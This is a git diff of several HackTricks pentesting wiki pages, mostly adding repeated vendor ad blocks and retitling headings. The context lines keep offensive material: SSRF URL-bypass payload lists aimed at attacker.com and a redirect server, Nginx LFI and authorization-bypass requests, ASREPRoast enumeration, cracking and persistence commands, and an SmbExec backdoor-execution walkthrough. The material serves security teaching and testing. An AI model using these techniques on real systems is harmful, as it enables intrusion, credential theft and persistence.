||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## Basic Information
|
||||
|
||||
In computing, **Virtual Network Computing** (**VNC**) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical-screen updates back in the other direction, over a network.\
|
||||
|
@ -64,6 +71,13 @@ I save the tool here also for ease of access:
|
|||
|
||||
* `port:5900 RFB`
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Nginx
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
# Missing root location <a href="#missing-root-location" id="missing-root-location"></a>
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## Missing root location <a href="#missing-root-location" id="missing-root-location"></a>
|
||||
|
||||
```
|
||||
server {
|
||||
|
@ -30,11 +36,11 @@ server {
|
|||
}
|
||||
```
|
||||
|
||||
The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`.  
|
||||
The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`.
|
||||
|
||||
A request as simple as `GET /nginx.conf` would reveal the contents of the Nginx configuration file stored in `/etc/nginx/nginx.conf`. If the root is set to `/etc`, a `GET` request to `/nginx/nginx.conf` would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication.
|
||||
|
||||
# Alias LFI Misconfiguration <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a>
|
||||
## Alias LFI Misconfiguration <a href="#alias-lfi-misconfiguration" id="alias-lfi-misconfiguration"></a>
|
||||
|
||||
Inside the Nginx configuration look the "location" statements, if someone looks like:
|
||||
|
||||
|
@ -78,7 +84,7 @@ alias../../../../../../../../../../../ => HTTP status code 400
|
|||
alias../ => HTTP status code 403
|
||||
```
|
||||
|
||||
# Unsafe variable use <a href="#unsafe-variable-use" id="unsafe-variable-use"></a>
|
||||
## Unsafe variable use <a href="#unsafe-variable-use" id="unsafe-variable-use"></a>
|
||||
|
||||
An example of a vulnerable Nginx configuration is:
|
||||
|
||||
|
@ -102,11 +108,11 @@ Detectify: clrf
|
|||
|
||||
Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/).
|
||||
|
||||
## Any variable
|
||||
### Any variable
|
||||
|
||||
In some cases, user-supplied data can be treated as an Nginx variable. It’s unclear why this may be happening, but it’s not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365), thus revealing that this is due to SSI.
|
||||
|
||||
One way to test for this is to set a referer header value: 
|
||||
One way to test for this is to set a referer header value:
|
||||
|
||||
```
|
||||
$ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’
|
||||
|
@ -114,9 +120,9 @@ $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar
|
|||
|
||||
We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched.
|
||||
|
||||
# Raw backend response reading
|
||||
## Raw backend response reading
|
||||
|
||||
With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response? 
|
||||
With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response?
|
||||
|
||||
If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx won’t understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this:
|
||||
|
||||
|
@ -127,7 +133,7 @@ def application(environ, start_response):
|
|||
return [b"Secret info, should not be visible!"]
|
||||
```
|
||||
|
||||
And with the following directives in Nginx: 
|
||||
And with the following directives in Nginx:
|
||||
|
||||
```
|
||||
http {
|
||||
|
@ -139,7 +145,7 @@ http {
|
|||
|
||||
[proxy\_intercept\_errors](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx.
|
||||
|
||||
[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client. 
|
||||
[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client.
|
||||
|
||||
If we send a normal `GET` request, Nginx will return:
|
||||
|
||||
|
@ -169,13 +175,13 @@ Secret-Header: secret-info
|
|||
Secret info, should not be visible!
|
||||
```
|
||||
|
||||
# merge\_slashes set to off
|
||||
## merge\_slashes set to off
|
||||
|
||||
The [merge\_slashes](http://nginx.org/en/docs/http/ngx\_http\_core\_module.html#merge\_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d).
|
||||
|
||||
We found 33 Nginx configuration files with `merge_slashes` set to “off”.  
|
||||
We found 33 Nginx configuration files with `merge_slashes` set to “off”.
|
||||
|
||||
# default is not specified for map directive
|
||||
## default is not specified for map directive
|
||||
|
||||
It looks like common case when **`map` is used for some kind of authorization control**. Simplified example could look like:
|
||||
|
||||
|
@ -208,11 +214,9 @@ server {
|
|||
> sets the resulting value if the source value matches none of the specified variants. When default is not specified, the default\
|
||||
> resulting value will be an empty string.
|
||||
|
||||
It is easy to forget about `default` value. So **malefactor can bypass this "authorization control"** simply accessing a **non existent case inside `/map-poc`** like `https://targethost.com/map-poc/another-private-area`. 
|
||||
|
||||
# DNS Spoofing Nginx
|
||||
|
||||
It is easy to forget about `default` value. So **malefactor can bypass this "authorization control"** simply accessing a **non existent case inside `/map-poc`** like `https://targethost.com/map-poc/another-private-area`.
|
||||
|
||||
## DNS Spoofing Nginx
|
||||
|
||||
According to this post: [http://blog.zorinaq.com/nginx-resol**ver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) **It might be possible to spoof DNS records** to Nginx if you **know the DNS server Nginx** is using (and you can intercept somehow the communication, so this is **not valid if 127.0.0.1** is used) and the **domain it's asking**.
|
||||
|
||||
|
@ -222,31 +226,37 @@ Nginx can specify a DNS server to use with:
|
|||
resolver 8.8.8.8;
|
||||
```
|
||||
|
||||
# `proxy_pass` and `internal` directives
|
||||
## `proxy_pass` and `internal` directives
|
||||
|
||||
The **`proxy_pass`** directive can be used to **redirect internally requests to other servers** internal or external.\
|
||||
The **`internal`** directive is used to make it clear to Nginx that the **location can only be accessed internally**.
|
||||
|
||||
The use of these directives **isn't a vulnerability but you should check how are them configured**.
|
||||
|
||||
# Try it yourself
|
||||
## Try it yourself
|
||||
|
||||
Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself!
|
||||
|
||||
[https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx)
|
||||
|
||||
# Static Analyzer tools
|
||||
## Static Analyzer tools
|
||||
|
||||
## [GIXY](https://github.com/yandex/gixy)
|
||||
### [GIXY](https://github.com/yandex/gixy)
|
||||
|
||||
Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection.
|
||||
|
||||
# References
|
||||
## References
|
||||
|
||||
* [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)****
|
||||
* ****[**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)****
|
||||
* ****[**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)****
|
||||
* [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)
|
||||
* [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
|
||||
* [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -263,5 +273,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# URL Format Bypass
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
## Localhost
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
### Localhost
|
||||
|
||||
```bash
|
||||
# Localhost
|
||||
|
@ -85,7 +91,7 @@ spoofed.burpcollaborator.net = 127.0.0.1
|
|||
|
||||
![](<../../.gitbook/assets/image (649) (1) (1).png>)
|
||||
|
||||
## Domain Parser
|
||||
### Domain Parser
|
||||
|
||||
```bash
|
||||
https:attacker.com
|
||||
|
@ -115,7 +121,7 @@ attacker。com
|
|||
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
||||
```
|
||||
|
||||
## Domain Confusion
|
||||
### Domain Confusion
|
||||
|
||||
```bash
|
||||
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
|
||||
|
@ -160,7 +166,7 @@ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
|
|||
next={domain}&next=attacker.com
|
||||
```
|
||||
|
||||
## Paths and Extensions Bypass
|
||||
### Paths and Extensions Bypass
|
||||
|
||||
If you are required that the URL must end in a path or an extension, or must contain a path you can try one of the following bypasses:
|
||||
|
||||
|
@ -170,7 +176,7 @@ https://metadata/vulerable/path#.extension
|
|||
https://metadata/expected/path/..%2f..%2f/vulnerable/path
|
||||
```
|
||||
|
||||
## Bypass via redirect
|
||||
### Bypass via redirect
|
||||
|
||||
It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\
|
||||
For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\
|
||||
|
@ -197,9 +203,9 @@ class Redirect(BaseHTTPRequestHandler):
|
|||
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
|
||||
```
|
||||
|
||||
# Explained Tricks
|
||||
## Explained Tricks
|
||||
|
||||
## Blackslash-trick
|
||||
### Blackslash-trick
|
||||
|
||||
In short, the _backslash-trick_ relies on exploiting a minor difference between two “URL” specifications: the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing), and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). RFC3986 is a generic, multi-purpose specification for the syntax of _Uniform Resource Identifiers_, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard.
|
||||
|
||||
|
@ -207,12 +213,18 @@ Both of them describe a way of parsing URI/URLs, with one slight difference. The
|
|||
|
||||
![The two specifications parsing the same URL differently](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)
|
||||
|
||||
## Other Confusions
|
||||
### Other Confusions
|
||||
|
||||
![](<../../.gitbook/assets/image (629).png>)
|
||||
|
||||
image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -229,5 +241,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**.
|
||||
|
||||
## Finding exposed pods with OSINT
|
||||
|
@ -223,6 +230,13 @@ For example, a remote attacker can abuse this by accessing the following URL: `h
|
|||
|
||||
{% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
|
|
@ -1,7 +1,5 @@
|
|||
# Reversing Tools & Basic Methods
|
||||
|
||||
## Reversing Tools & Basic Methods
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -18,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## Wasm decompiler / Wat compiler
|
||||
|
||||
Online:
|
||||
|
@ -398,6 +403,13 @@ So, in this challenge, knowing the values of the buttons, you needed to **press
|
|||
* [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering)
|
||||
* [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# ASREPRoast
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
# ASREPRoast
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## ASREPRoast
|
||||
|
||||
The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_.
|
||||
|
||||
|
@ -25,13 +31,13 @@ That means that anyone can send an AS\_REQ request to the DC on behalf of any of
|
|||
|
||||
Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**.
|
||||
|
||||
### Enumerating vulnerable users (need domain credentials)
|
||||
#### Enumerating vulnerable users (need domain credentials)
|
||||
|
||||
```bash
|
||||
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
|
||||
```
|
||||
|
||||
### Request AS\_REP message
|
||||
#### Request AS\_REP message
|
||||
|
||||
{% code title="Using Linux" %}
|
||||
```bash
|
||||
|
@ -49,14 +55,14 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
## Cracking
|
||||
### Cracking
|
||||
|
||||
```
|
||||
john --wordlist=passwords_kerb.txt hashes.asreproast
|
||||
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
||||
```
|
||||
|
||||
## Persistence
|
||||
### Persistence
|
||||
|
||||
Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties):
|
||||
|
||||
|
@ -66,6 +72,12 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
|
|||
|
||||
[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -82,5 +94,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Kerberos Authentication
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
**This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
|
||||
|
||||
# Kerberos (I): How does Kerberos work? – Theory
|
||||
## Kerberos (I): How does Kerberos work? – Theory
|
||||
|
||||
20 - MAR - 2019 - ELOY PÉREZ
|
||||
|
||||
|
@ -31,13 +37,13 @@ In this first post only basic functionality will be discussed. In later posts it
|
|||
|
||||
If you have any doubt about the topic which it is not well explained, do not be afraid on leave a comment or question about it. Now, onto the topic.
|
||||
|
||||
## What is Kerberos?
|
||||
### What is Kerberos?
|
||||
|
||||
Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access.
|
||||
|
||||
Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources.
|
||||
|
||||
## Kerberos items
|
||||
### Kerberos items
|
||||
|
||||
In this section several components of Kerberos environment will be studied.
|
||||
|
||||
|
@ -98,7 +104,7 @@ Below is shown a summary of message sequency to perform authentication
|
|||
|
||||
![Kerberos messages summary](<../../.gitbook/assets/image (174).png>)
|
||||
|
||||
## Authentication process
|
||||
### Authentication process
|
||||
|
||||
In this section, the sequency of messages to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service.
|
||||
|
||||
|
@ -115,7 +121,7 @@ _KRB\_AS\_REQ_ has, among others, the following fields:
|
|||
* The service **SPN** asociated with **krbtgt** account
|
||||
* A **Nonce** generated by the user
|
||||
|
||||
Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) __ flag is set in user account.
|
||||
Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) \_\_ flag is set in user account.
|
||||
|
||||
**KRB\_AS\_REP**
|
||||
|
||||
|
@ -187,7 +193,7 @@ _KRB\_AP\_REQ_ includes:
|
|||
|
||||
After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a _KRB\_AP\_REP_ message.
|
||||
|
||||
## References
|
||||
### References
|
||||
|
||||
* Kerberos v5 RFC: [https://tools.ietf.org/html/rfc4120](https://tools.ietf.org/html/rfc4120)
|
||||
* \[MS-KILE] – Kerberos extension: [https://msdn.microsoft.com/en-us/library/cc233855.aspx](https://msdn.microsoft.com/en-us/library/cc233855.aspx)
|
||||
|
@ -213,6 +219,12 @@ After that, if user privileges are rigth, this can access to service. If is the
|
|||
* Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: [https://www.microsoft.com/en-us/download/details.aspx?id=36036](https://www.microsoft.com/en-us/download/details.aspx?id=36036)
|
||||
* Fun with LDAP, Kerberos (and MSRPC) in AD Environments: [https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -229,5 +241,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# SmbExec/ScExec
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,12 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
# How does it works
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
**Smbexec works like Psexec.** In this example**,** **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor.
|
||||
## How does it works
|
||||
|
||||
# **SMBExec**
|
||||
**Smbexec works like Psexec.** In this example\*\*,\*\* **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor.
|
||||
|
||||
## **SMBExec**
|
||||
|
||||
Let's see what happens when smbexec runs by looking at it from the attackers and target's side:
|
||||
|
||||
|
@ -33,7 +39,7 @@ So we know it creates a service "BTOBTO". But that service isn't present on the
|
|||
|
||||
The Service File Name contains a command string to execute (%COMSPEC% points to the absolute path of cmd.exe). It echoes the command to be executed to a bat file, redirects the stdout and stderr to a Temp file, then executes the bat file and deletes it. Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our "pseudo-shell". For every command we type into our "shell", a new service is created and the process is repeated. This is why it doesn't need to drop a binary, it just executes each desired command as a new service. Definitely more stealthy, but as we saw, an event log is created for every command executed. Still a very clever way to get a non-interactive "shell"!
|
||||
|
||||
# Manual SMBExec
|
||||
## Manual SMBExec
|
||||
|
||||
**Or executing commands via services**
|
||||
|
||||
|
@ -55,10 +61,14 @@ And then start it:
|
|||
|
||||
It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed.
|
||||
|
||||
|
||||
|
||||
All the info was extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -75,5 +85,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Stealing Credentials
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
